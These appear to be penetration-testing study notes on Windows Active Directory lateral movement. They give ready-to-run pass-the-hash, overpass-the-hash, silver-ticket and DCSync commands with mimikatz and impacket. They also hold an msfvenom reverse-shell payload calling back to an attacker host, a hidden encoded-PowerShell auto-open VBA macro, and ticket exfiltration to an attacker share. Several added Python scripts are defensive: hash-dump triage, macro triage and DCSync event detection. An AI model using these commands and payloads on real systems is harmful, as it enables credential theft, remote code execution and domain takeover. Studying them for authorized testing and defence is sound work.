Lateral movement

Pass the hash

NT LAN Manager (NTLM) hashes are computed with MD4. The older LAN Manager (LM) hash is known to be very weak, since passwords longer than seven characters are split into two strings and each piece is hashed separately.

The SAM file cannot be copied while the OS is running, but mimikatz can dump the SAM hashes from memory!

Pass-the-Hash
(NTLM-based AuthN)

Requires the user/service account to have local admin rights on the target, as the connection is made over the Admin$ share.
Requires an SMB connection through the firewall.
Requires the Windows File and Print Sharing feature to be enabled.
# Method 1
$ pth-winexe -U [domain]/[username]%[blank_hash]:[ntlm_hash] //[target] [command_to_exec]
$ pth-winexe -U xor/Administrator%aad3b435b51404eeaad3b435b51404ee:08df31234567890bf6 //10.1.1.1 cmd.exe
^ Or try without the domain prefix in the -U flag

# Method 2
$ python wmiexec.py Administrator@[target] -hashes [LM]:[NT/NTLM]
$ python wmiexec.py Administrator@10.11.1.22 -hashes [leave_blank_if_no_LM]:ee12345067801f38115019ca2fb

# Method 3
$ python psexec.py [username]@[target] -hashes :[NT/NTLM]

# Method 4 - RDP PTH
$ xfreerdp /u:Administrator /pth:[NTLM hash] /d:[domain] /v:[target]
^ If the error "Account Restrictions are preventing this user from signing in." occurs, enable Restricted Admin Mode:
$ crackmapexec smb [target] -u [username] -H [hash] -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

# Method 5 - see guide https://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/
$ crackmapexec smb [target] -u [username] -H [hash] -x "whoami"

THE BLANK LM HASH

The string "aad3b435b51404eeaad3b435b51404ee" is the LM hash for 'no password'. In other words, it's empty. Typically it is seen at the top of a hash dump from Windows and looks something like this:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:8118cb8789b3a147c790db402b016a08:::

https://yougottahackthat.com/blog/339/what-is-aad3b435b51404eeaad3b435b51404ee
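Added example, not from these notes: a small triage of a pwdump-style dump (user:RID:LM:NT:::) from an authorized assessment, flagging accounts that still have a real LM hash stored, accounts with an empty password, and accounts sharing an NT hash. The sample dump is constructed; only the first line mirrors the layout above.

```python
# Added example, not part of the original notes: triage a pwdump-style dump
# (user:RID:LM:NT:::) from an authorized assessment for weak hash storage.
import re
from collections import defaultdict

BLANK_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "no password": LM storage disabled
BLANK_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def parse_dump(text):
    """Yield (user, rid, lm, nt) for every well-formed line; skip anything else."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            yield user, int(rid), lm.lower(), nt.lower()


def triage(text):
    """Report accounts with a real LM hash, an empty password, or a shared NT hash."""
    lm_stored, empty_password, by_nt = [], [], defaultdict(list)
    for user, _rid, lm, nt in parse_dump(text):
        if lm != BLANK_LM:  # anything but the blank LM hash means LM hashes are still stored
            lm_stored.append(user)
        if nt == BLANK_NT:
            empty_password.append(user)
        by_nt[nt].append(user)
    reused = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return {"lm_stored": lm_stored, "empty_password": empty_password, "reused_nt": reused}


# Constructed sample dump: the first line is the layout shown in the notes,
# the LM hash on the third line is a made-up value, not a real hash.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8118cb8789b3a147c790db402b016a08:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy_svc:1105:0123456789abcdef0123456789abcdef:8118cb8789b3a147c790db402b016a08:::
not a hash line
"""

if __name__ == "__main__":
    print(triage(SAMPLE_DUMP))
```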

Overpass the hash

  • Turns an NTLM hash into a Kerberos ticket and avoids the use of NTLM authentication.

  • Obtain other users' NTLM hashes with sekurlsa::logonpasswords, then execute the following with mimikatz:

sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe

This opens a PowerShell window running as the user whose NTLM hash was supplied.

After that, authenticate to the domain controller with net use:

net use \\dc01   ## this authenticates the user to the domain and generates a TGT and a TGS

and run

klist   ## lists cached tickets

Now that we have authenticated as the user, we can run PsExec.exe to launch cmd.exe remotely on the domain controller! (Transfer PsExec.exe first if necessary.)

.\PsExec.exe \\dc01 cmd.exe

OPTH via Kali

# [OPTION 1 TICKET RETRIEVAL] Request the TGT with the hash
$ python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with the AES key (stronger encryption, probably stealthier since it is what Microsoft uses by default)
$ python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with the password
$ python getTGT.py <domain_name>/<user_name>:[password]
# If not provided, the password is prompted for

# [OPTION 2 TICKET RETRIEVAL] export the tickets -> copy them to Kali
mimikatz> sekurlsa::tickets /export
cmd> copy [ticket.kirbi] \\192.168.119.XXX\share\[ticket.kirbi]
# use ticket_converter.py to convert .kirbi to .ccache
# https://github.com/Zer1t0/ticket_converter
$ python ticket_converter.py ticket.kirbi ticket.ccache

# Set the TGT for impacket use
$ export KRB5CCNAME=<TGT_ccache_file>

# execute remote commands with any of the following by using the TGT
$ python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Silver ticket

  • Have the NTLM hash or password of a service account? -> you can forge your own service ticket -> access the target resource (e.g. IIS)!

What do we need?

  1. SID (Security Identifier)

Within this structure, the SID begins with a literal "S" to identify the string as a SID, followed by a revision level (usually set to "1"), an identifier-authority value (often "5" within AD) and one or more subauthority values.

Example:

S-1-5-21-2536614405-3629634762-1218571035-1116

Get it with

whoami /user 
S-1-5-21-2536614405-3629634762-1218571035-1116

Ignore the last part (1116 is the RID, which identifies a specific object in the domain) and take note of "S-1-5-21-2536614405-3629634762-1218571035", which is the domain SID.

  • Needed: username, domain name, domain SID, host name of the service, the service type and the password hash of the service account.
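Added example, not from these notes: parsing a SID string into its parts and splitting the domain SID from the RID the way the note above does by hand. The well-known RID table is from MS-DTYP; the SID used is the one from the whoami /user output above.

```python
# Added example, not part of the original notes: parse a Windows SID string and
# separate the domain SID from the trailing RID.
import re

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")

# A few well-known RIDs (MS-DTYP); handy when reviewing which principal a SID names.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 519: "Enterprise Admins"}


def parse_sid(sid):
    """Return (revision, identifier authority, [subauthorities]) or raise ValueError."""
    m = SID_RE.match(sid.strip())
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority, subs = int(m.group(1)), int(m.group(2)), m.group(3)
    return revision, authority, [int(s) for s in subs.split("-")[1:]]


def split_domain_sid(sid):
    """Split an AD account SID into (domain_sid, rid); domain SIDs look like S-1-5-21-A-B-C."""
    revision, authority, subs = parse_sid(sid)
    if (revision, authority) != (1, 5) or len(subs) != 5 or subs[0] != 21:
        raise ValueError(f"not an AD account SID: {sid!r}")
    domain_sid = "S-1-5-21-" + "-".join(str(s) for s in subs[1:4])
    return domain_sid, subs[4]


def describe(sid):
    """(domain_sid, rid, what the RID is known as, if anything)."""
    domain_sid, rid = split_domain_sid(sid)
    return domain_sid, rid, WELL_KNOWN_RIDS.get(rid, "domain-specific object")


if __name__ == "__main__":
    # The SID shown in the notes' whoami /user output.
    print(describe("S-1-5-21-2536614405-3629634762-1218571035-1116"))
```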

  2. Flush the previously generated Kerberos tickets and forge the new one with

kerberos::purge
kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748290D87AA966C327 /ptt

Now we can abuse those silver tickets!

# abuse Silver Ticket (TGS)
cmd> psexec.exe -accepteula \\<remote_hostname> cmd   # psexec
cmd> sqlcmd.exe -S [service_hostname]                 # if service is MSSQL
# generate the Silver Ticket with NTLM
$ python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

# set the ticket for impacket use
$ export KRB5CCNAME=<TGT_ccache_file_path>

# execute remote commands with any of the following by using the TGT
$ python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
$ python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Distributed Component Object Model

(works best on workstations, as it targets Office products such as Excel and PowerPoint)

rdesktop to the target

open PowerShell

Distributed Component Object Model (DCOM)

The Microsoft Component Object Model (COM) is a system for creating software components that interact with each other (a very old technology!).

  • DCOM allows a computer to run programs over the network on a different computer, e.g. Excel/PowerPoint/Outlook.

  • Requires RPC port 135 (COM) and local admin access to call the DCOM Service Control Manager (the API).

  • The Run method exposed over DCOM allows us to execute a VBA macro remotely.

DCOM - create payload and VBA macro

# (kali) create rshell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=[kali] LPORT=4444 -f hta-psh -o evil.hta

# (python) split the payload into smaller chunks, starting with "powershell.exe -nop -w hidden -e"
payload = "powershell.exe -nop -w hidden -e {base64_encoded_payload}"
n = 50  # characters per chunk
for i in range(0, len(payload), n):
    # each printed line is one VBA statement appending a chunk to Str
    print('Str = Str + "' + payload[i:i+n] + '"')
# this bypasses the size limit on string literals in Excel macros
# create VBA macro -> insert into Excel file
# open Excel > View > Macros > name it whatever > Create (save the workbook as .xls)
Sub AutoOpen()
    exploit
End Sub
Sub Document_Open()
    exploit
End Sub
Sub exploit()
        Dim Str As String
        {insert_payload}    ' paste the generated Str = Str + "..." lines here
        ' OPTION 2
        ' CreateObject("Wscript.Shell").Run Str
End Sub

# check whether the document contains a valid exploit macro
$ mraptor [exploit.doc]

# run the macro
.\exceldcom.ps1
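Added example, not from these notes and not mraptor's own code: a small triage of extracted VBA source for the patterns this macro relies on (an auto-exec trigger plus an execution primitive, and the chunked Str = Str + "..." concatenation), approximating the rule mraptor applies. Assumes the macro text has already been pulled out of the document (e.g. with olevba); the sample macro is constructed in the shape shown above.

```python
# Added example, not part of the original notes and not mraptor's code: triage
# extracted VBA source for auto-exec triggers and execution primitives.
# Assumes the macro text was already extracted (e.g. with olevba).
import re

AUTOEXEC = re.compile(r"\bSub\s+(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b", re.I)
EXEC_PRIMITIVES = {
    "Shell call": re.compile(r"(?<![.\w])Shell\b", re.I),
    "Wscript.Shell": re.compile(r'CreateObject\s*\(\s*"Wscript\.Shell"\s*\)', re.I),
    ".Run": re.compile(r"\.Run\b", re.I),
    "powershell": re.compile(r"powershell(\.exe)?\s", re.I),
    "encoded command": re.compile(r"\s-(e|enc|encodedcommand)\s", re.I),
}
# The chunked 'Str = Str + "..."' pattern used to dodge the string literal size limit.
CONCAT = re.compile(r'^\s*(\w+)\s*=\s*\1\s*[+&]\s*"', re.M)


def triage_macro(vba):
    """Return auto-exec triggers, execution primitives, chunk count and a verdict."""
    autoexec = AUTOEXEC.findall(vba)
    suspicious = [name for name, rx in EXEC_PRIMITIVES.items() if rx.search(vba)]
    chunks = len(CONCAT.findall(vba))
    return {
        "autoexec": autoexec,
        "suspicious": suspicious,
        "concat_chunks": chunks,
        # mraptor-style verdict: runs by itself AND is able to execute something
        "flagged": bool(autoexec) and bool(suspicious),
    }


# Constructed macro in the shape shown in the notes; the base64 is just "ABCDEFGHIJKLMNOP".
SAMPLE_MACRO = '''Sub AutoOpen()
    exploit
End Sub
Sub exploit()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e "
    Str = Str + "QUJDREVGR0hJSktMTU5PUA=="
    CreateObject("Wscript.Shell").Run Str
End Sub
'''

if __name__ == "__main__":
    print(triage_macro(SAMPLE_MACRO))
```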

Domain Controller Synchronization

  • Steal the password hashes of all administrative users.

  • Move laterally to the domain controller and run mimikatz to dump the hash of every user, or steal a copy of the NTDS.dit database file (a copy of all AD accounts stored on the hard drive); either way leaves an access trail.

  • Domains usually have more than one DC to provide redundancy; we can request an update for an account with IDL_DRSGetNCChanges. It only checks whether we are a member of the Domain Admins group, by SID.

  • This way we could discover more account creds in the domain.

lsadump::dcsync /user:Administrator
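Added example, not from these notes: detection logic for the replication request described above, run over constructed Windows event 4662 records. Assumes each record is one line of key=value pairs separated by "|" (a simplified rendering, not the real event XML) and that the accounts allowed to replicate (the DCs) are known; the GUIDs are the real DS-Replication control access rights.

```python
# Added example, not part of the original notes: flag DCSync-style replication
# requests in constructed, simplified Windows event 4662 records. Assumes one
# record per line as key=value pairs separated by "|" (a simplified rendering,
# not the real event XML) and a known list of legitimate replicators.
DS_REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Accounts expected to replicate: the DCs themselves (constructed names).
ALLOWED_REPLICATORS = {"corp\\dc01$", "corp\\dc02$"}


def parse_record(line):
    """Turn 'k=v|k=v' into a dict (values may themselves contain '=')."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|"))


def replication_rights(properties):
    """Map the GUIDs listed in the Properties field to replication right names."""
    guids = [g.strip("{} ").lower() for g in properties.split(",") if g.strip()]
    return [DS_REPLICATION_RIGHTS[g] for g in guids if g in DS_REPLICATION_RIGHTS]


def detect_dcsync(lines, allowed=ALLOWED_REPLICATORS):
    """One alert per 4662 event where a principal other than a DC used replication rights."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("EventID") != "4662":
            continue
        rights = replication_rights(rec.get("Properties", ""))
        if not rights:
            continue
        subject = f"{rec.get('SubjectDomainName', '')}\\{rec.get('SubjectUserName', '')}"
        if subject.lower() in allowed:
            continue
        alerts.append({"subject": subject, "object": rec.get("ObjectName", ""), "rights": rights})
    return alerts


# Constructed records: a legitimate DC replication, a user account doing the same
# (the DCSync pattern), an unrelated 4662 with a placeholder GUID, and a non-4662 event.
SAMPLE_LOG = [
    "EventID=4662|SubjectUserName=DC02$|SubjectDomainName=CORP|ObjectName=DC=corp,DC=com|Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662|SubjectUserName=jeff_admin|SubjectDomainName=CORP|ObjectName=DC=corp,DC=com|Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662|SubjectUserName=alice|SubjectDomainName=CORP|ObjectName=CN=alice,CN=Users,DC=corp,DC=com|Properties={00000000-0000-0000-0000-000000000000}",
    "EventID=4624|SubjectUserName=alice|SubjectDomainName=CORP",
]

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_LOG):
        print(alert)
```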
